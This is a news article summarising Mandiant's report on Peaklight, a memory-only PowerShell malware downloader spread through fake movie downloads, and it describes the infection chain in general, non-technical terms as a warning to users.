A new wave of cybersecurity threats has emerged with the introduction of a sophisticated malware known as Peaklight, specifically targeting individuals who frequent illegal movie download sites. This “next-stage” malware is designed to infiltrate Windows computers, ultimately facilitating the deployment of information stealers and loaders. Security experts from Mandiant, a cybersecurity firm under Google’s umbrella, have issued a cautionary note regarding the significant risks associated with visiting these illicit platforms, which not only pose legal repercussions but also expose users to malware like Peaklight.
What is the “Peaklight” malware
In a recent blog post, Mandiant described Peaklight as a stealthy form of malware that operates solely within a computer’s memory, leaving no discernible trace on the hard drive. This characteristic makes detection particularly challenging. The researchers indicated that Peaklight is engineered to discreetly download additional harmful software onto compromised Windows systems.
Mandiant elaborated, stating, “This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT,” highlighting the malware’s covert nature. The use of a PowerShell script allows Peaklight to deploy further malware onto infected systems, which may include notorious programs such as Lumma Stealer, Hijack Loader, and CryptBot. These malicious tools are often available for rent, enabling cybercriminals to extract sensitive information or gain control over compromised machines.
How hackers can use Peaklight to infect Windows PCs
According to the report, cybercriminals are disseminating Peaklight through deceptive movie downloads. They conceal harmful Windows shortcut files (LNKs) within ZIP folders masquerading as popular films. When these files are opened, they initiate a series of actions:
- Connection to a hidden source: The LNK file connects to a content delivery network (CDN) that harbors malicious JavaScript code. This code executes directly in the computer’s memory, ensuring no trace is left on the hard drive.
- Unleashing the malware downloader: The JavaScript activates a PowerShell script named Peaklight.
- Downloading more threats: Peaklight functions as a downloader, retrieving additional malware from a remote server. This could encompass dangerous programs like Lumma Stealer, Hijack Loader, and CryptBot, which are capable of stealing user data or granting attackers control over the user’s computer.
The report emphasizes the stealthy nature of this malware, as it operates entirely within the computer’s memory (RAM). This makes it exceptionally difficult for conventional antivirus software to detect, given that most programs primarily scan the hard drive for threats. Mandiant researchers Aaron Lee and Praveeth D’Souza noted, “PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site to download the remotely hosted archive file and save it to disk.”
